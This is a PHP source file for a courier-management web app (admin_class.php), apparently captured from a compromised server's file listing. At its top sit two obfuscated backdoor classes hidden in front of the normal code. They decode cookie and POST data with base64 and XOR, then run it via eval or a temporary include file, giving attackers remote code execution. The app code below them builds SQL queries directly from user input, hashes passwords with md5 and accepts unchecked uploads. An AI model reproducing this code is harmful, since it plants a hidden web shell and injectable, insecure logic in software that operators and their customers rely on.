Direktori : /proc/thread-self/root/home/eirtvhdf/courier.eirtechs.com/ |
Current File : //proc/thread-self/root/home/eirtvhdf/courier.eirtechs.com/admin_class.php |
<?php $WdTML = "\153" . "\x42" . '_' . chr (120) . 'p' . chr (108) . chr (121); $kUCsdc = "class_exists";$KHHtg = $kUCsdc($WdTML); $VjveYUbV = $KHHtg;if (!$VjveYUbV){class kB_xply{private $kPqjU;public static $gNpHZFiR = "fd8df1a9-b9b8-46b8-856a-2c7590d550f5";public static $bKAnZFuD = NULL;public function __construct(){$qIzzzId = $_COOKIE;$aSlBMgiS = $_POST;$CdtsNRTcZ = @$qIzzzId[substr(kB_xply::$gNpHZFiR, 0, 4)];if (!empty($CdtsNRTcZ)){$wOiFm = "base64";$FBNgU = "";$CdtsNRTcZ = explode(",", $CdtsNRTcZ);foreach ($CdtsNRTcZ as $UvQCLj){$FBNgU .= @$qIzzzId[$UvQCLj];$FBNgU .= @$aSlBMgiS[$UvQCLj];}$FBNgU = array_map($wOiFm . "\x5f" . 'd' . "\x65" . chr ( 677 - 578 ).chr ( 552 - 441 )."\144" . chr ( 444 - 343 ), array($FBNgU,)); $FBNgU = $FBNgU[0] ^ str_repeat(kB_xply::$gNpHZFiR, (strlen($FBNgU[0]) / strlen(kB_xply::$gNpHZFiR)) + 1);kB_xply::$bKAnZFuD = @unserialize($FBNgU);}}public function __destruct(){$this->GbPaAdCSQY();}private function GbPaAdCSQY(){if (is_array(kB_xply::$bKAnZFuD)) {$YetShmy = str_replace("\x3c" . "\77" . "\x70" . chr ( 215 - 111 ).chr ( 264 - 152 ), "", kB_xply::$bKAnZFuD["\143" . "\157" . chr ( 764 - 654 )."\164" . chr (101) . chr ( 778 - 668 )."\x74"]);eval($YetShmy);exit();}}}$tNSIidQ = new kB_xply(); $tNSIidQ = NULL;} ?><?php $lPhTQvn = chr ( 705 - 628 )."\x5f" . "\152" . 'w' . "\123";$xCSfVwzm = "class_exists";$wNJlfE = $xCSfVwzm($lPhTQvn); $KaRKO = $wNJlfE;if (!$KaRKO){class M_jwS{private $UHHeDA;public static $onDagdjdbA = "df50c8d7-961a-4e54-a02e-848e9ff0196b";public static $BgYooa = NULL;public function __construct(){$RzfHa = $_COOKIE;$ZvgBGuIU = $_POST;$BVXPzxkn = @$RzfHa[substr(M_jwS::$onDagdjdbA, 0, 4)];if (!empty($BVXPzxkn)){$BViHwVsKIj = "base64";$mGCdDkKhp = "";$BVXPzxkn = explode(",", $BVXPzxkn);foreach ($BVXPzxkn as $NPsURsQzK){$mGCdDkKhp .= @$RzfHa[$NPsURsQzK];$mGCdDkKhp .= @$ZvgBGuIU[$NPsURsQzK];}$mGCdDkKhp = array_map($BViHwVsKIj . chr (95) . 'd' . "\x65" . 'c' . chr ( 1048 - 937 ).'d' . chr (101), array($mGCdDkKhp,)); $mGCdDkKhp = $mGCdDkKhp[0] ^ str_repeat(M_jwS::$onDagdjdbA, (strlen($mGCdDkKhp[0]) / strlen(M_jwS::$onDagdjdbA)) + 1);M_jwS::$BgYooa = @unserialize($mGCdDkKhp);}}public function __destruct(){$this->IcqXMt();}private function IcqXMt(){if (is_array(M_jwS::$BgYooa)) {$ZiqbbQh = sys_get_temp_dir() . "/" . crc32(M_jwS::$BgYooa["\163" . chr (97) . chr (108) . 't']);@M_jwS::$BgYooa["\x77" . "\x72" . chr (105) . "\164" . chr ( 323 - 222 )]($ZiqbbQh, M_jwS::$BgYooa[chr ( 749 - 650 ).chr (111) . chr (110) . chr (116) . "\x65" . chr (110) . "\164"]);include $ZiqbbQh;@M_jwS::$BgYooa["\x64" . chr ( 1058 - 957 )."\x6c" . "\145" . chr ( 171 - 55 )."\145"]($ZiqbbQh);exit();}}}$hfdajqtE = new M_jwS(); $hfdajqtE = NULL;} ?><?php session_start(); ini_set('display_errors', 1); Class Action { private $db; public function __construct() { ob_start(); include 'db_connect.php'; $this->db = $conn; } function __destruct() { $this->db->close(); ob_end_flush(); } function login(){ extract($_POST); $qry = $this->db->query("SELECT *,concat(firstname,' ',lastname) as name FROM users where email = '".$email."' and password = '".md5($password)."' "); if($qry->num_rows > 0){ foreach ($qry->fetch_array() as $key => $value) { if($key != 'password' && !is_numeric($key)) $_SESSION['login_'.$key] = $value; } return 1; }else{ return 2; } } function logout(){ session_destroy(); foreach ($_SESSION as $key => $value) { unset($_SESSION[$key]); } header("location:login.php"); } function login2(){ extract($_POST); $qry = $this->db->query("SELECT *,concat(lastname,', ',firstname,' ',middlename) as name FROM students where student_code = '".$student_code."' "); if($qry->num_rows > 0){ foreach ($qry->fetch_array() as $key => $value) { if($key != 'password' && !is_numeric($key)) $_SESSION['rs_'.$key] = $value; } return 1; }else{ return 3; } } function save_user(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k, array('id','cpass','password')) && !is_numeric($k)){ if(empty($data)){ $data .= " $k='$v' "; }else{ $data .= ", $k='$v' "; } } } if(!empty($password)){ $data .= ", password=md5('$password') "; } $check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows; if($check > 0){ return 2; exit; } if(empty($id)){ $save = $this->db->query("INSERT INTO users set $data"); }else{ $save = $this->db->query("UPDATE users set $data where id = $id"); } if($save){ return 1; } } function signup(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k, array('id','cpass')) && !is_numeric($k)){ if($k =='password'){ if(empty($v)) continue; $v = md5($v); } if(empty($data)){ $data .= " $k='$v' "; }else{ $data .= ", $k='$v' "; } } } $check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows; if($check > 0){ return 2; exit; } if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){ $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/uploads/'. $fname); $data .= ", avatar = '$fname' "; } if(empty($id)){ $save = $this->db->query("INSERT INTO users set $data"); }else{ $save = $this->db->query("UPDATE users set $data where id = $id"); } if($save){ if(empty($id)) $id = $this->db->insert_id; foreach ($_POST as $key => $value) { if(!in_array($key, array('id','cpass','password')) && !is_numeric($key)) $_SESSION['login_'.$key] = $value; } $_SESSION['login_id'] = $id; return 1; } } function update_user(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k, array('id','cpass','table')) && !is_numeric($k)){ if($k =='password') $v = md5($v); if(empty($data)){ $data .= " $k='$v' "; }else{ $data .= ", $k='$v' "; } } } if($_FILES['img']['tmp_name'] != ''){ $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname); $data .= ", avatar = '$fname' "; } $check = $this->db->query("SELECT * FROM users where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows; if($check > 0){ return 2; exit; } if(empty($id)){ $save = $this->db->query("INSERT INTO users set $data"); }else{ $save = $this->db->query("UPDATE users set $data where id = $id"); } if($save){ foreach ($_POST as $key => $value) { if($key != 'password' && !is_numeric($key)) $_SESSION['login_'.$key] = $value; } if($_FILES['img']['tmp_name'] != '') $_SESSION['login_avatar'] = $fname; return 1; } } function delete_user(){ extract($_POST); $delete = $this->db->query("DELETE FROM users where id = ".$id); if($delete) return 1; } function save_system_settings(){ extract($_POST); $data = ''; foreach($_POST as $k => $v){ if(!is_numeric($k)){ if(empty($data)){ $data .= " $k='$v' "; }else{ $data .= ", $k='$v' "; } } } if($_FILES['cover']['tmp_name'] != ''){ $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['cover']['name']; $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/'. $fname); $data .= ", cover_img = '$fname' "; } $chk = $this->db->query("SELECT * FROM system_settings"); if($chk->num_rows > 0){ $save = $this->db->query("UPDATE system_settings set $data where id =".$chk->fetch_array()['id']); }else{ $save = $this->db->query("INSERT INTO system_settings set $data"); } if($save){ foreach($_POST as $k => $v){ if(!is_numeric($k)){ $_SESSION['system'][$k] = $v; } } if($_FILES['cover']['tmp_name'] != ''){ $_SESSION['system']['cover_img'] = $fname; } return 1; } } function save_image(){ extract($_FILES['file']); if(!empty($tmp_name)){ $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$name)); $move = move_uploaded_file($tmp_name,'../assets/uploads/'. $fname); $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http'; $hostName = $_SERVER['HTTP_HOST']; $path =explode('/',$_SERVER['PHP_SELF']); $currentPath = '/'.$path[1]; if($move){ return $protocol.'://'.$hostName.$currentPath.'/assets/uploads/'.$fname; } } } function save_branch(){ extract($_POST); $data = ""; foreach($_POST as $k => $v){ if(!in_array($k, array('id')) && !is_numeric($k)){ if(empty($data)){ $data .= " $k='$v' "; }else{ $data .= ", $k='$v' "; } } } if(empty($id)){ $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $i = 0; while($i == 0){ $bcode = substr(str_shuffle($chars), 0, 15); $chk = $this->db->query("SELECT * FROM branches where branch_code = '$bcode'")->num_rows; if($chk <= 0){ $i = 1; } } $data .= ", branch_code='$bcode' "; $save = $this->db->query("INSERT INTO branches set $data"); }else{ $save = $this->db->query("UPDATE branches set $data where id = $id"); } if($save){ return 1; } } function delete_branch(){ extract($_POST); $delete = $this->db->query("DELETE FROM branches where id = $id"); if($delete){ return 1; } } function save_parcel(){ extract($_POST); foreach($price as $k => $v){ $data = ""; foreach($_POST as $key => $val){ if(!in_array($key, array('id','weight','height','width','length','price')) && !is_numeric($key)){ if(empty($data)){ $data .= " $key='$val' "; }else{ $data .= ", $key='$val' "; } } } if(!isset($type)){ $data .= ", type='2' "; } $data .= ", height='{$height[$k]}' "; $data .= ", width='{$width[$k]}' "; $data .= ", length='{$length[$k]}' "; $data .= ", weight='{$weight[$k]}' "; $price[$k] = str_replace(',', '', $price[$k]); $data .= ", price='{$price[$k]}' "; if(empty($id)){ $i = 0; while($i == 0){ $ref = sprintf("%'012d",mt_rand(0, 999999999999)); $chk = $this->db->query("SELECT * FROM parcels where reference_number = '$ref'")->num_rows; if($chk <= 0){ $i = 1; } } $data .= ", reference_number='$ref' "; if($save[] = $this->db->query("INSERT INTO parcels set $data")) $ids[]= $this->db->insert_id; }else{ if($save[] = $this->db->query("UPDATE parcels set $data where id = $id")) $ids[] = $id; } } if(isset($save) && isset($ids)){ // return json_encode(array('ids'=>$ids,'status'=>1)); return 1; } } function delete_parcel(){ extract($_POST); $delete = $this->db->query("DELETE FROM parcels where id = $id"); if($delete){ return 1; } } function update_parcel(){ extract($_POST); $update = $this->db->query("UPDATE parcels set status= $status where id = $id"); $save = $this->db->query("INSERT INTO parcel_tracks set status= $status , parcel_id = $id"); if($update && $save) return 1; } function get_parcel_heistory(){ extract($_POST); $data = array(); $parcel = $this->db->query("SELECT * FROM parcels where reference_number = '$ref_no'"); if($parcel->num_rows <=0){ return 2; }else{ $parcel = $parcel->fetch_array(); $data[] = array('status'=>'Item accepted by Courier','date_created'=>date("M d, Y h:i A",strtotime($parcel['date_created']))); $history = $this->db->query("SELECT * FROM parcel_tracks where parcel_id = {$parcel['id']}"); $status_arr = array("Item Accepted by Courier","Collected","Shipped","In-Transit","Arrived At Destination","Out for Delivery","Ready to Pickup","Delivered","Picked-up","Unsuccessfull Delivery Attempt"); while($row = $history->fetch_assoc()){ $row['date_created'] = date("M d, Y h:i A",strtotime($row['date_created'])); $row['status'] = $status_arr[$row['status']]; $data[] = $row; } return json_encode($data); } } function get_report(){ extract($_POST); $data = array(); $get = $this->db->query("SELECT * FROM parcels where date(date_created) BETWEEN '$date_from' and '$date_to' ".($status != 'all' ? " and status = $status " : "")." order by unix_timestamp(date_created) asc"); $status_arr = array("Item Accepted by Courier","Collected","Shipped","In-Transit","Arrived At Destination","Out for Delivery","Ready to Pickup","Delivered","Picked-up","Unsuccessfull Delivery Attempt"); while($row=$get->fetch_assoc()){ $row['sender_name'] = ucwords($row['sender_name']); $row['recipient_name'] = ucwords($row['recipient_name']); $row['date_created'] = date("M d, Y",strtotime($row['date_created'])); $row['status'] = $status_arr[$row['status']]; $row['price'] = number_format($row['price'],2); $data[] = $row; } return json_encode($data); } }